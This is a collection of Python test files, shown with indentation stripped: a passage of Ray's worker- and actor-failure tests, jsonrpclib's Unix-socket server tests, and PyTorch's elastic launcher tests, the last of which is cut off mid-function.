f = tempfile.NamedTemporaryFile(suffix=".py")
f.write(temporary_python_file.encode("ascii"))
f.flush()
directory = os.path.dirname(f.name)
# Get the module name and strip ".py" from the end.
module_name = os.path.basename(f.name)[:-3]
sys.path.append(directory)
module = __import__(module_name)
# Define a function that closes over this temporary module. This should
# fail when it is unpickled.
@ray.remote
def g():
return module.temporary_python_file()
wait_for_errors(ray_constants.REGISTER_REMOTE_FUNCTION_PUSH_ERROR, 2)
errors = relevant_errors(ray_constants.REGISTER_REMOTE_FUNCTION_PUSH_ERROR)
assert len(errors) == 2
assert "No module named" in errors[0]["message"]
assert "No module named" in errors[1]["message"]
# Check that if we try to call the function it throws an exception and
# does not hang.
for _ in range(10):
with pytest.raises(Exception):
ray.get(g.remote())
f.close()
# Clean up the junk we added to sys.path.
sys.path.pop(-1)
def test_failed_function_to_run(ray_start_regular):
def f(worker):
if ray.worker.global_worker.mode == ray.WORKER_MODE:
raise Exception("Function to run failed.")
ray.worker.global_worker.run_function_on_all_workers(f)
wait_for_errors(ray_constants.FUNCTION_TO_RUN_PUSH_ERROR, 2)
# Check that the error message is in the task info.
errors = relevant_errors(ray_constants.FUNCTION_TO_RUN_PUSH_ERROR)
assert len(errors) == 2
assert "Function to run failed." in errors[0]["message"]
assert "Function to run failed." in errors[1]["message"]
def test_fail_importing_actor(ray_start_regular):
# Create the contents of a temporary Python file.
temporary_python_file = """
def temporary_helper_function():
return 1
"""
f = tempfile.NamedTemporaryFile(suffix=".py")
f.write(temporary_python_file.encode("ascii"))
f.flush()
directory = os.path.dirname(f.name)
# Get the module name and strip ".py" from the end.
module_name = os.path.basename(f.name)[:-3]
sys.path.append(directory)
module = __import__(module_name)
# Define an actor that closes over this temporary module. This should
# fail when it is unpickled.
@ray.remote
class Foo(object):
def __init__(self):
self.x = module.temporary_python_file()
def get_val(self):
return 1
# There should be no errors yet.
assert len(ray.error_info()) == 0
# Create an actor.
foo = Foo.remote()
# Wait for the error to arrive.
wait_for_errors(ray_constants.REGISTER_ACTOR_PUSH_ERROR, 1)
errors = relevant_errors(ray_constants.REGISTER_ACTOR_PUSH_ERROR)
assert "No module named" in errors[0]["message"]
# Wait for the error from when the __init__ tries to run.
wait_for_errors(ray_constants.TASK_PUSH_ERROR, 1)
errors = relevant_errors(ray_constants.TASK_PUSH_ERROR)
assert ("failed to be imported, and so cannot execute this method" in
errors[0]["message"])
# Check that if we try to get the function it throws an exception and
# does not hang.
with pytest.raises(Exception):
ray.get(foo.get_val.remote())
# Wait for the error from when the call to get_val.
wait_for_errors(ray_constants.TASK_PUSH_ERROR, 2)
errors = relevant_errors(ray_constants.TASK_PUSH_ERROR)
assert ("failed to be imported, and so cannot execute this method" in
errors[1]["message"])
f.close()
# Clean up the junk we added to sys.path.
sys.path.pop(-1)
def test_failed_actor_init(ray_start_regular):
error_message1 = "actor constructor failed"
error_message2 = "actor method failed"
@ray.remote
class FailedActor(object):
def __init__(self):
raise Exception(error_message1)
def fail_method(self):
raise Exception(error_message2)
a = FailedActor.remote()
# Make sure that we get errors from a failed constructor.
wait_for_errors(ray_constants.TASK_PUSH_ERROR, 1)
errors = relevant_errors(ray_constants.TASK_PUSH_ERROR)
assert len(errors) == 1
assert error_message1 in errors[0]["message"]
# Make sure that we get errors from a failed method.
a.fail_method.remote()
wait_for_errors(ray_constants.TASK_PUSH_ERROR, 2)
errors = relevant_errors(ray_constants.TASK_PUSH_ERROR)
assert len(errors) == 2
assert error_message1 in errors[1]["message"]
def test_failed_actor_method(ray_start_regular):
error_message2 = "actor method failed"
@ray.remote
class FailedActor(object):
def __init__(self):
pass
def fail_method(self):
raise Exception(error_message2)
a = FailedActor.remote()
# Make sure that we get errors from a failed method.
a.fail_method.remote()
wait_for_errors(ray_constants.TASK_PUSH_ERROR, 1)
errors = relevant_errors(ray_constants.TASK_PUSH_ERROR)
assert len(errors) == 1
assert error_message2 in errors[0]["message"]
def test_incorrect_method_calls(ray_start_regular):
@ray.remote
class Actor(object):
def __init__(self, missing_variable_name):
pass
def get_val(self, x):
pass
# Make sure that we get errors if we call the constructor incorrectly.
# Create an actor with too few arguments.
with pytest.raises(Exception):
a = Actor.remote()
# Create an actor with too many arguments.
with pytest.raises(Exception):
a = Actor.remote(1, 2)
# Create an actor the correct number of arguments.
a = Actor.remote(1)
# Call a method with too few arguments.
with pytest.raises(Exception):
a.get_val.remote()
# Call a method with too many arguments.
with pytest.raises(Exception):
a.get_val.remote(1, 2)
# Call a method that doesn't exist.
with pytest.raises(AttributeError):
a.nonexistent_method()
with pytest.raises(AttributeError):
a.nonexistent_method.remote()
def test_worker_raising_exception(ray_start_regular):
@ray.remote
def f():
ray.worker.global_worker._get_next_task_from_local_scheduler = None
# Running this task should cause the worker to raise an exception after
# the task has successfully completed.
f.remote()
wait_for_errors(ray_constants.WORKER_CRASH_PUSH_ERROR, 1)
wait_for_errors(ray_constants.WORKER_DIED_PUSH_ERROR, 1)
def test_worker_dying(ray_start_regular):
# Define a remote function that will kill the worker that runs it.
@ray.remote
def f():
eval("exit()")
with pytest.raises(ray.exceptions.RayWorkerError):
ray.get(f.remote())
wait_for_errors(ray_constants.WORKER_DIED_PUSH_ERROR, 1)
errors = relevant_errors(ray_constants.WORKER_DIED_PUSH_ERROR)
assert len(errors) == 1
assert "died or was killed while executing" in errors[0]["message"]
def test_actor_worker_dying(ray_start_regular):
@ray.remote
class Actor(object):
def kill(self):
eval("exit()")
@ray.remote
def consume(x):
pass
a = Actor.remote()
[obj], _ = ray.wait([a.kill.remote()], timeout=5.0)
with pytest.raises(ray.exceptions.RayActorError):
ray.get(obj)
with pytest.raises(ray.exceptions.RayTaskError):
ray.get(consume.remote(obj))
wait_for_errors(ray_constants.WORKER_DIED_PUSH_ERROR, 1)
def test_actor_worker_dying_future_tasks(ray_start_regular):
@ray.remote
class Actor(object):
def getpid(self):
return os.getpid()
def sleep(self):
time.sleep(1)
a = Actor.remote()
pid = ray.get(a.getpid.remote())
tasks1 = [a.sleep.remote() for _ in range(10)]
os.kill(pid, 9)
time.sleep(0.1)
tasks2 = [a.sleep.remote() for _ in range(10)]
for obj in tasks1 + tasks2:
with pytest.raises(Exception):
ray.get(obj)
wait_for_errors(ray_constants.WORKER_DIED_PUSH_ERROR, 1)
def test_actor_worker_dying_nothing_in_progress(ray_start_regular):
@ray.remote
class Actor(object):
def getpid(self):
return os.getpid()
a = Actor.remote()
pid = ray.get(a.getpid.remote())
os.kill(pid, 9)
time.sleep(0.1)
task2 = a.getpid.remote()
with pytest.raises(Exception):
ray.get(task2)
def test_actor_scope_or_intentionally_killed_message(ray_start_regular):
@ray.remote
class Actor(object):
pass
a = Actor.remote()
a = Actor.remote()
a.__ray_terminate__.remote()
time.sleep(1)
assert len(ray.error_info()) == 0, (
"Should not have propogated an error - {}".format(ray.error_info()))
@pytest.fixture
def ray_start_object_store_memory():
# Start the Ray processes.
store_size = 10**6
ray.init(num_cpus=1, object_store_memory=store_size)
yield None
# The code after the yield will run as teardown code.
ray.shutdown()
@pytest.mark.skip("This test does not work yet.")
def test_put_error1(ray_start_object_store_memory):
num_objects = 3
object_size = 4 * 10**5
# Define a task with a single dependency, a numpy array, that returns
# another array.
@ray.remote
def single_dependency(i, arg):
arg = np.copy(arg)
arg[0] = i
return arg
@ray.remote
def put_arg_task():
# Launch num_objects instances of the remote task, each dependent
# on the one before it. The result of the first task should get
# evicted.
args = []
arg = single_dependency.remote(0, np.zeros(
object_size, dtype=np.uint8))
for i in range(num_objects):
arg = single_dependency.remote(i, arg)
args.append(arg)
# Get the last value to force all tasks to finish.
value = ray.get(args[-1])
assert value[0] == i
# Get the first value (which should have been evicted) to force
# reconstruction. Currently, since we're not able to reconstruct
# `ray.put` objects that were evicted and whose originating tasks
# are still running, this for-loop should hang and push an error to
# the driver.
ray.get(args[0])
put_arg_task.remote()
# Make sure we receive the correct error message.
wait_for_errors(ray_constants.PUT_RECONSTRUCTION_PUSH_ERROR, 1)
@pytest.mark.skip("This test does not work yet.")
def test_put_error2(ray_start_object_store_memory):
# This is the same as the previous test, but it calls ray.put directly.
num_objects = 3
object_size = 4 * 10**5
# Define a task with a single dependency, a numpy array, that returns
# another array.
@ray.remote
def single_dependency(i, arg):
arg = np.copy(arg)
arg[0] = i
return arg
@ray.remote
def put_task():
# Launch num_objects instances of the remote task, each dependent
# on the one before it. The result of the first task should get
# evicted.
args = []
arg = ray.put(np.zeros(object_size, dtype=np.uint8))
for i in range(num_objects):
arg = single_dependency.remote(i, arg)
args.append(arg)
# Get the last value to force all tasks to finish.
value = ray.get(args[-1])
assert value[0] == i
# Get the first value (which should have been evicted) to force
# reconstruction. Currently, since we're not able to reconstruct
# `ray.put` objects that were evicted and whose originating tasks
# are still running, this for-loop should hang and push an error to
# the driver.
ray.get(args[0])
put_task.remote()
# Make sure we receive the correct error message.
wait_for_errors(ray_constants.PUT_RECONSTRUCTION_PUSH_ERROR, 1)
def test_version_mismatch(shutdown_only):
ray_version = ray.__version__
ray.__version__ = "fake ray version"
ray.init(num_cpus=1)
wait_for_errors(ray_constants.VERSION_MISMATCH_PUSH_ERROR, 1)
# Reset the version.
ray.__version__ = ray_version
def test_warning_monitor_died(shutdown_only):
ray.init(num_cpus=0)
time.sleep(1) # Make sure the monitor has started.
# Cause the monitor to raise an exception by pushing a malformed message to
# Redis. This will probably kill the raylets and the raylet_monitor in
# addition to the monitor.
fake_id = 20 * b"\x00"
malformed_message = "asdf"
redis_client = ray.worker.global_worker.redis_client
redis_client.execute_command(
"RAY.TABLE_ADD", ray.gcs_utils.TablePrefix.HEARTBEAT_BATCH,
ray.gcs_utils.TablePubsub.HEARTBEAT_BATCH, fake_id, malformed_message)
wait_for_errors(ray_constants.MONITOR_DIED_ERROR, 1)
def test_export_large_objects(ray_start_regular):
import ray.ray_constants as ray_constants
large_object = np.zeros(2 * ray_constants.PICKLE_OBJECT_WARNING_SIZE)
@ray.remote
def f():
large_object
# Make sure that a warning is generated.
wait_for_errors(ray_constants.PICKLING_LARGE_OBJECT_PUSH_ERROR, 1)
@ray.remote
class Foo(object):
def __init__(self):
large_object
Foo.remote()
# Make sure that a warning is generated.
wait_for_errors(ray_constants.PICKLING_LARGE_OBJECT_PUSH_ERROR, 2)
def test_warning_for_infeasible_tasks(ray_start_regular):
# Check that we get warning messages for infeasible tasks.
@ray.remote(num_gpus=1)
def f():
pass
@ray.remote(resources={"Custom": 1})
class Foo(object):
pass
# This task is infeasible.
f.remote()
wait_for_errors(ray_constants.INFEASIBLE_TASK_ERROR, 1)
# This actor placement task is infeasible.
Foo.remote()
wait_for_errors(ray_constants.INFEASIBLE_TASK_ERROR, 2)
def test_warning_for_infeasible_zero_cpu_actor(shutdown_only):
# Check that we cannot place an actor on a 0 CPU machine and that we get an
# infeasibility warning (even though the actor creation task itself
# requires no CPUs).
ray.init(num_cpus=0)
@ray.remote
class Foo(object):
pass
# The actor creation should be infeasible.
Foo.remote()
wait_for_errors(ray_constants.INFEASIBLE_TASK_ERROR, 1)
def test_warning_for_too_many_actors(shutdown_only):
# Check that if we run a workload which requires too many workers to be
# started that we will receive a warning.
num_cpus = 2
ray.init(num_cpus=num_cpus)
@ray.remote
class Foo(object):
def __init__(self):
time.sleep(1000)
[Foo.remote() for _ in range(num_cpus * 3)]
wait_for_errors(ray_constants.WORKER_POOL_LARGE_ERROR, 1)
[Foo.remote() for _ in range(num_cpus)]
wait_for_errors(ray_constants.WORKER_POOL_LARGE_ERROR, 2)
def test_warning_for_too_many_nested_tasks(shutdown_only):
# Check that if we run a workload which requires too many workers to be
# started that we will receive a warning.
num_cpus = 2
ray.init(num_cpus=num_cpus)
@ray.remote
def f():
time.sleep(1000)
return 1
@ray.remote
def g():
# Sleep so that the f tasks all get submitted to the scheduler after
# the g tasks.
time.sleep(1)
ray.get(f.remote())
[g.remote() for _ in range(num_cpus * 4)]
wait_for_errors(ray_constants.WORKER_POOL_LARGE_ERROR, 1)
def test_redis_module_failure(shutdown_only):
address_info = ray.init(num_cpus=1)
redis_address = address_info["redis_address"]
redis_address = redis_address.split(":")
assert len(redis_address) == 2
def run_failure_test(expecting_message, *command):
with pytest.raises(
Exception, match=".*{}.*".format(expecting_message)):
client = redis.StrictRedis(
host=redis_address[0], port=int(redis_address[1]))
client.execute_command(*command)
def run_one_command(*command):
client = redis.StrictRedis(
host=redis_address[0], port=int(redis_address[1]))
client.execute_command(*command)
run_failure_test("wrong number of arguments", "RAY.TABLE_ADD", 13)
run_failure_test("Prefix must be in the TablePrefix range",
"RAY.TABLE_ADD", 100000, 1, 1, 1)
run_failure_test("Prefix must be in the TablePrefix range",
"RAY.TABLE_REQUEST_NOTIFICATIONS", 100000, 1, 1, 1)
run_failure_test("Prefix must be a valid TablePrefix integer",
"RAY.TABLE_ADD", b"a", 1, 1, 1)
run_failure_test("Pubsub channel must be in the TablePubsub range",
"RAY.TABLE_ADD", 1, 10000, 1, 1)
run_failure_test("Pubsub channel must be a valid integer", "RAY.TABLE_ADD",
1, b"a", 1, 1)
# Change the key from 1 to 2, since the previous command should have
# succeeded at writing the key, but not publishing it.
run_failure_test("Index is less than 0.", "RAY.TABLE_APPEND", 1, 1, 2, 1,
-1)
run_failure_test("Index is not a number.", "RAY.TABLE_APPEND", 1, 1, 2, 1,
b"a")
run_one_command("RAY.TABLE_APPEND", 1, 1, 2, 1)
# It's okay to add duplicate entries.
run_one_command("RAY.TABLE_APPEND", 1, 1, 2, 1)
run_one_command("RAY.TABLE_APPEND", 1, 1, 2, 1, 0)
run_one_command("RAY.TABLE_APPEND", 1, 1, 2, 1, 1)
@pytest.fixture
def ray_start_two_nodes():
# Start the Ray processes.
cluster = Cluster()
for _ in range(2):
cluster.add_node(
num_cpus=0,
_internal_config=json.dumps({
"num_heartbeats_timeout": 40
}))
ray.init(redis_address=cluster.redis_address)
yield cluster
# The code after the yield will run as teardown code.
ray.shutdown()
cluster.shutdown()
# Note that this test will take at least 10 seconds because it must wait for
# the monitor to detect enough missed heartbeats.
def test_warning_for_dead_node(ray_start_two_nodes):
cluster = ray_start_two_nodes
cluster.wait_for_nodes()
client_ids = {item["ClientID"] for item in ray.global_state.client_table()}
# Try to make sure that the monitor has received at least one heartbeat
# from the node.
time.sleep(0.5)
# Kill both raylets.
cluster.list_all_nodes()[1].kill_raylet()
cluster.list_all_nodes()[0].kill_raylet()
# Check that we get warning messages for both raylets.
wait_for_errors(ray_constants.REMOVED_NODE_ERROR, 2, timeout=40)
# Extract the client IDs from the error messages. This will need to be
# changed if the error message changes.
warning_client_ids = {
item["message"].split(" ")[5]
for item in relevant_errors(ray_constants.REMOVED_NODE_ERROR)
}
assert client_ids == warning_client_ids
def test_raylet_crash_when_get(ray_start_regular):
nonexistent_id = ray.ObjectID(_random_string())
def sleep_to_kill_raylet():
# Don't kill raylet before default workers get connected.
time.sleep(2)
ray.worker._global_node.kill_raylet()
thread = threading.Thread(target=sleep_to_kill_raylet)
thread.start()
with pytest.raises(Exception, match=r".*Connection closed unexpectedly.*"):
ray.get(nonexistent_id)
thread.join()
|
test_unix.py
|
#!/usr/bin/python
# -- Content-Encoding: UTF-8 --
"""
Tests the server & client in Unix socket mode (when available)
:license: Apache License 2.0
"""
# JSON-RPC library
from jsonrpclib import ServerProxy
from jsonrpclib.SimpleJSONRPCServer import SimpleJSONRPCServer
# Standard library
import os
import random
import socket
import threading
import unittest
# ------------------------------------------------------------------------------
if not hasattr(socket, "AF_UNIX"):
raise unittest.SkipTest("Unix sockets are not supported here.")
class UnixSocketTests(unittest.TestCase):
"""
These tests ensures that the server and client work in Unix socket mode
"""
def test_full_path(self):
"""
Starts a Unix socket server, giving with a full path to the socket
"""
# Ensure we have a new socket
socket_name = "/tmp/test_server.socket"
if os.path.exists(socket_name):
os.remove(socket_name)
# Use a random int as result
awaited_result = random.randint(1, 100)
try:
# Prepare the server
srv = SimpleJSONRPCServer(
socket_name, address_family=socket.AF_UNIX
)
srv.register_function(lambda: awaited_result, "test")
# Run the server in a thread
thread = threading.Thread(target=srv.serve_forever)
thread.start()
try:
# Run the request (use '.' as hostname)
client = ServerProxy("unix+http://./{}".format(socket_name))
result = client.test()
self.assertEqual(result, awaited_result)
finally:
# Stop the server
srv.shutdown()
srv.server_close()
thread.join(5)
finally:
# Clean up
try:
os.remove(socket_name)
except:
pass
def test_host_only(self):
"""
Starts a Unix socket server, giving with a relative path to the socket
"""
# Ensure we have a new socket
socket_name = "test_local.socket"
if os.path.exists(socket_name):
os.remove(socket_name)
# Use a random int as result
awaited_result = random.randint(1, 100)
try:
# Prepare the server
srv = SimpleJSONRPCServer(
socket_name, address_family=socket.AF_UNIX
)
srv.register_function(lambda: awaited_result, "test")
# Run the server in a thread
thread = threading.Thread(target=srv.serve_forever)
thread.start()
try:
# Run the request
client = ServerProxy("unix+http://{}".format(socket_name))
result = client.test()
self.assertEqual(result, awaited_result)
finally:
# Stop the server
srv.shutdown()
srv.server_close()
thread.join(5)
finally:
# Clean up
try:
os.remove(socket_name)
except:
pass
|
run_test.py
|
#!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
# All rights reserved.
#
# This source code is licensed under the BSD-style license found in the
# LICENSE file in the root directory of this source tree.
import multiprocessing as mp
import os
import shutil
import subprocess
import tempfile
import unittest
import uuid
from contextlib import closing
from unittest import mock
from unittest.mock import Mock, patch
import torch.distributed.run as launch
from torch.distributed.elastic.agent.server.api import RunResult, WorkerState
from torch.distributed.elastic.multiprocessing.errors import ChildFailedError
from torch.distributed.elastic.rendezvous.etcd_server import EtcdServer
from torch.distributed.elastic.utils import get_socket_with_port
from torch.testing._internal.common_utils import (
TEST_WITH_DEV_DBG_ASAN,
sandcastle_skip_if,
)
def launch_in_proc(args):
launch.main(args)
def path(script):
return os.path.join(os.path.dirname(__file__), script)
def get_child_pids(pid):
pgrep = subprocess.Popen(args=f"pgrep -P {pid}", shell=True, stdout=subprocess.PIPE)
pgrep.wait()
out = pgrep.stdout.read().decode("utf-8").rstrip().split("\n")
pids = []
for pid in out:
if pid:
pids.append(int(pid))
return pids
def pid_exists(pid):
try:
os.kill(pid, 0)
return True
except OSError:
return False
class MockException(Exception):
pass
class ElasticLaunchTest(unittest.TestCase):
@classmethod
def setUpClass(cls):
# start a standalone, single process etcd server to use for all tests
cls._etcd_server = EtcdServer()
cls._etcd_server.start()
cls._etcd_endpoint = cls._etcd_server.get_endpoint()
@classmethod
def tearDownClass(cls):
# stop the standalone etcd server
cls._etcd_server.stop()
def setUp(self):
self.test_dir = tempfile.mkdtemp()
# remove any lingering environment variables
for env in os.environ.keys():
if env.startswith("PET_"):
del os.environ[env]
# set a sentinel env var on the parent proc
# this should be present on the child and gets
# asserted in ``bin/test_script.py``
os.environ["TEST_SENTINEL_PARENT"] = "FOOBAR"
def tearDown(self):
shutil.rmtree(self.test_dir)
def test_launch_user_script_python(self):
run_id = str(uuid.uuid4().int)
nnodes = 1
nproc_per_node = 4
world_size = nnodes * nproc_per_node
args = [
f"--nnodes={nnodes}",
f"--nproc_per_node={nproc_per_node}",
"--rdzv_backend=etcd",
f"--rdzv_endpoint={self._etcd_endpoint}",
f"--rdzv_id={run_id}",
"--monitor_interval=1",
"--start_method=spawn",
path("bin/test_script.py"),
f"--touch_file_dir={self.test_dir}",
]
launch.main(args)
# make sure all the workers ran
# each worker touches a file with its global rank as the name
self.assertSetEqual(
{str(i) for i in range(world_size)}, set(os.listdir(self.test_dir))
)
def test_launch_user_script_python_caffe2_bc(self):
nnodes = 1
nproc_per_node = 4
world_size = nnodes * nproc_per_node
sock = get_socket_with_port()
with closing(sock):
master_port = sock.getsockname()[1]
args = [
f"--nnodes={nnodes}",
f"--nproc_per_node={nproc_per_node}",
"--monitor_interval=1",
"--start_method=spawn",
"--master_addr=localhost",
f"--master_port={master_port}",
"--node_rank=0",
path("bin/test_script.py"),
f"--touch_file_dir={self.test_dir}",
]
launch.main(args)
# make sure all the workers ran
# each worker touches a file with its global rank as the name
self.assertSetEqual(
{str(i) for i in range(world_size)}, set(os.listdir(self.test_dir))
)
@sandcastle_skip_if(TEST_WITH_DEV_DBG_ASAN, "test incompatible with dev/dbg asan")
def test_launch_user_script_bash(self):
run_id = str(uuid.uuid4().int)
nnodes = 1
nproc_per_node = 4
world_size = nnodes * nproc_per_node
args = [
f"--nnodes={nnodes}",
f"--nproc_per_node={nproc_per_node}",
"--rdzv_backend=etcd",
f"--rdzv_endpoint={self._etcd_endpoint}",
f"--rdzv_id={run_id}",
"--monitor_interval=1",
"--start_method=spawn",
"--no_python",
]
script_args = [path("bin/test_script.sh"), f"{self.test_dir}"]
with self.assertRaises(ValueError):
# --no_python cannot be used with --module
launch.main(args + ["--module"] + script_args)
launch.main(args + script_args)
# make sure all the workers ran
# each worker touches a file with its global rank as the name
self.assertSetEqual(
{str(i) for i in range(world_size)}, set(os.listdir(self.test_dir))
)
@sandcastle_skip_if(TEST_WITH_DEV_DBG_ASAN, "test incompatible with dev/dbg asan")
def test_launch_user_script_default_nproc(self):
run_id = str(uuid.uuid4().int)
nnodes = 1
world_size = 1
args = [
f"--nnodes={nnodes}",
"--rdzv_backend=etcd",
f"--rdzv_endpoint={self._etcd_endpoint}",
f"--rdzv_id={run_id}",
"--monitor_interval=1",
"--start_method=spawn",
"--no_python",
]
script_args = [path("bin/test_script.sh"), f"{self.test_dir}"]
with self.assertRaises(ValueError):
# --no_python cannot be used with --module
launch.main(args + ["--module"] + script_args)
launch.main(args + script_args)
# make sure all the workers ran
# each worker touches a file with its global rank as the name
self.assertSetEqual(
{str(i) for i in range(world_size)}, set(os.listdir(self.test_dir))
)
@sandcastle_skip_if(TEST_WITH_DEV_DBG_ASAN, "test incompatible with dev/dbg asan")
def test_launch_with_env_vars(self):
run_id = str(uuid.uuid4().int)
nnodes = 1
nproc_per_node = 4
world_size = nnodes * nproc_per_node
os.environ["PET_NNODES"] = str(nnodes)
os.environ["PET_NPROC_PER_NODE"] = str(nproc_per_node)
os.environ["PET_RDZV_BACKEND"] = "etcd"
os.environ["PET_RDZV_ENDPOINT"] = self._etcd_endpoint
os.environ["PET_RDZV_ID"] = run_id
os.environ["PET_MONITOR_INTERVAL"] = "1"
os.environ["PET_START_METHOD"] = "spawn"
os.environ["PET_NO_PYTHON"] = "1"
script_args = [path("bin/test_script.sh"), f"{self.test_dir}"]
with self.assertRaises(ValueError):
# --no_python cannot be used with --module
os.environ["PET_MODULE"] = "1"
launch.main(script_args)
os.environ["PET_MODULE"] = "0"
launch.main(script_args)
# make sure all the workers ran
# each worker touches a file with its global rank as the name
self.assertSetEqual(
{str(i) for i in range(world_size)}, set(os.listdir(self.test_dir))
)
def _test_nproc_launch_configuration(self, nproc_type, expected_number):
run_id = str(uuid.uuid4().int)
nnodes = 1
args = [
f"--nnodes={nnodes}",
f"--nproc_per_node={nproc_type}",
"--rdzv_backend=etcd",
f"--rdzv_endpoint={self._etcd_endpoint}",
f"--rdzv_id={run_id}",
"--monitor_interval=1",
"--start_method=spawn",
"--no_python",
]
script_args = [path("bin/test_script.sh"), f"{self.test_dir}"]
launch.main(args + script_args)
world_size = nnodes * expected_number
# make sure all the workers ran
# each worker touches a file with its global rank as the name
self.assertSetEqual(
{str(i) for i in range(world_size)}, set(os.listdir(self.test_dir))
)
@sandcastle_skip_if(TEST_WITH_DEV_DBG_ASAN, "test incompatible with dev/dbg asan")
def test_nproc_launch_auto_configurations(self):
self._test_nproc_launch_configuration("auto", os.cpu_count())
@sandcastle_skip_if(TEST_WITH_DEV_DBG_ASAN, "test incompatible with dev/dbg asan")
def test_nproc_launch_number_configurations(self):
self._test_nproc_launch_configuration("4", 4)
@sandcastle_skip_if(TEST_WITH_DEV_DBG_ASAN, "test incompatible with dev/dbg asan")
def test_nproc_launch_unknown_configurations(self):
with self.assertRaises(ValueError):
self._test_nproc_launch_configuration("unknown", 4)
@sandcastle_skip_if(TEST_WITH_DEV_DBG_ASAN, "test incompatible with dev/dbg asan")
@patch("torch.cuda.is_available", return_value=True)
@patch("torch.cuda.device_count", return_value=3)
def test_nproc_gpu_launch_configurations(self, _mock1, _mock2):
self._test_nproc_launch_configuration("auto", 3)
self._test_nproc_launch_configuration("gpu", 3)
@sandcastle_skip_if(TEST_WITH_DEV_DBG_ASAN, "test incompatible with dev/dbg asan")
def test_launch_elastic(self):
run_id = str(uuid.uuid4().int)
min_nodes = 1
max_nodes = 2
nproc_per_node = 4
# we are only launching 1 node (even though max = 2)
world_size = nproc_per_node
args = [
f"--nnodes={min_nodes}:{max_nodes}",
f"--nproc_per_node={nproc_per_node}",
"--rdzv_backend=etcd",
f"--rdzv_endpoint={self._etcd_endpoint}",
f"--rdzv_id={run_id}",
"--monitor_interval=1",
"--start_method=spawn",
path("bin/test_script.py"),
f"--touch_file_dir={self.test_dir}",
]
launch.main(args)
# make sure all the workers ran
# each worker touches a file with its global rank as the name
self.assertSetEqual(
{str(i) for i in range(world_size)}, set(os.listdir(self.test_dir))
)
@mock.patch("torch.distributed.elastic.events.record")
@sandcastle_skip_if(TEST_WITH_DEV_DBG_ASAN, "test incompatible with dev/dbg asan")
def test_launch_elastic_worker_raise_exception(self, record_mock):
"""
Asserts that when the worker program fails and lancher raieses exception
to indicate that worker process failed
"""
run_id = str(uuid.uuid4().int)
min_nodes = 1
max_nodes = 2
nproc_per_node = 4
args = [
f"--nnodes={min_nodes}:{max_nodes}",
f"--nproc_per_node={nproc_per_node}",
"--rdzv_backend=etcd",
f"--rdzv_endpoint={self._etcd_endpoint}",
f"--rdzv_id={run_id}",
"--monitor_interval=1",
"--max_restarts=0",
"--start_method=spawn",
path("bin/test_script.py"),
"--fail",
]
with self.assertRaises(ChildFailedError):
launch.main(args)
record_mock.assert_called_once()
@sandcastle_skip_if(TEST_WITH_DEV_DBG_ASAN, "test incompatible with dev/dbg asan")
@mock.patch(
"torch.distributed.elastic.agent.server.local_elastic_agent.LocalElasticAgent.run"
)
@mock.patch("torch.distributed.elastic.events.record")
def test_launch_elastic_agent_raise_exception(self, record_mock, mock_agent_run):
"""
Asserts that when the agent raises an exception
the launcher re-raises the original exception
"""
run_id = str(uuid.uuid4().int)
min_nodes = 1
max_nodes = 2
nproc_per_node = 4
args = [
f"--nnodes={min_nodes}:{max_nodes}",
f"--nproc_per_node={nproc_per_node}",
"--rdzv_backend=etcd",
f"--rdzv_endpoint={self._etcd_endpoint}",
f"--rdzv_id={run_id}",
"--monitor_interval=1",
"--max_restarts=0",
"--start_method=spawn",
path("bin/test_script.py"),
f"--touch_file_dir={self.test_dir}",
]
mock_agent_run.side_effect = MockException
with self.assertRaises(MockException):
launch.main(args)
record_mock.assert_called_once()
@sandcastle_skip_if(TEST_WITH_DEV_DBG_ASAN, "test incompatible with dev/dbg asan")
def test_launch_standalone(self):
nnodes = 1
nproc_per_node = 4
world_size = nnodes * nproc_per_node
args = [
f"--nnodes={nnodes}",
f"--nproc_per_node={nproc_per_node}",
"--standalone",
"--monitor_interval=1",
"--start_method=spawn",
path("bin/test_script.py"),
f"--touch_file_dir={self.test_dir}",
]
launch.main(args)
# make sure all the workers ran
# each worker touches a file with its global rank as the name
self.assertSetEqual(
{str(i) for i in range(world_size)}, set(os.listdir(self.test_dir))
)
@sandcastle_skip_if(TEST_WITH_DEV_DBG_ASAN, "test incompatible with dev/dbg asan")
def test_launch_run_path(self):
nnodes = 1
nproc_per_node = 4
world_size = nnodes * nproc_per_node
args = [
"--run_path",
f"--nnodes={nnodes}",
f"--nproc_per_node={nproc_per_node}",
"--monitor_interval=1",
"--start_method=spawn",
path("bin/test_script.py"),
f"--touch_file_dir={self.test_dir}",
]
launch.main(args)
# make sure all the workers ran
# each worker touches a file with its global rank as the name
self.assertSetEqual(
{str(i) for i in range(world_size)}, set(os.listdir(self.test_dir))
)
@sandcastle_skip_if(TEST_WITH_DEV_DBG_ASAN, "test incompatible with dev/dbg asan")
def test_launch_elastic_multiple_agents(self):
run_id = str(uuid.uuid4().int)
min_nodes = 1
max_nodes = 2
nproc_per_node = 4
nnodes = 2
world_size = nnodes * nproc_per_node
args = [
f"--nnodes={min_nodes}:{max_nodes}",
f"--nproc_per_node={nproc_per_node}",
"--rdzv_backend=etcd",
f"--rdzv_endpoint={self._etcd_endpoint}",
f"--rdzv_id={run_id}",
"--monitor_interval=1",
"--start_method=spawn",
path("bin/test_script.py"),
f"--touch_file_dir={self.test_dir}",
]
procs = []
for _ in range(nnodes - 1):
p = mp.Process(target=launch.main, args=[args])
procs.append(p)
p.start()
launch.main(args)
for i in range(nnodes - 1):
p = procs[i]
p.join()
self.assertEqual(0, p.exitcode)
# make sure all the workers ran
# each worker touches a file with its global rank as the name
self.assertSetEqual(
{str(i) for i in range(world_size)}, set(os.listdir(self.test_dir))
)
def test_min_max_nodes_parse(self):
min_nodes, max_nodes = launch.parse_min_max_nnodes("1")
self.assertTrue(min_nodes, max_nodes)
self.assertTrue(1, min_nodes)
min_nodes, max_nodes = launch.parse_min_max_nnodes("2:20")
self.assertTrue(2, min_nodes)
self.assertTrue(20, max_nodes)
with self.assertRaises(RuntimeError):
launch.parse_min_max_nnodes("2:20:30")
@patch("torch.distributed.launcher.api.LocalElasticAgent")
def test_launch_shutdown(self, agent_mock_cls):
nnodes = 1
nproc_per_node = 4
args = [
f"--nnodes={nnodes}",
f"--nproc_per_node={nproc_per_node}",
"--monitor_interval=1",
"--start_method=spawn",
path("bin/test_script.py"),
f"--touch_file_dir={self.test_dir}",
]
agent_mock = Mock()
agent_mock.run.return_value = RunResult(WorkerState.SUCCEEDED)
agent_mock_cls.return_value = agent_mock
rdzv_handler_mock = Mock()
with patch(
"torch.distributed.elastic.rendezvous.registry.get_rendezvous_handler"
) as param_mock:
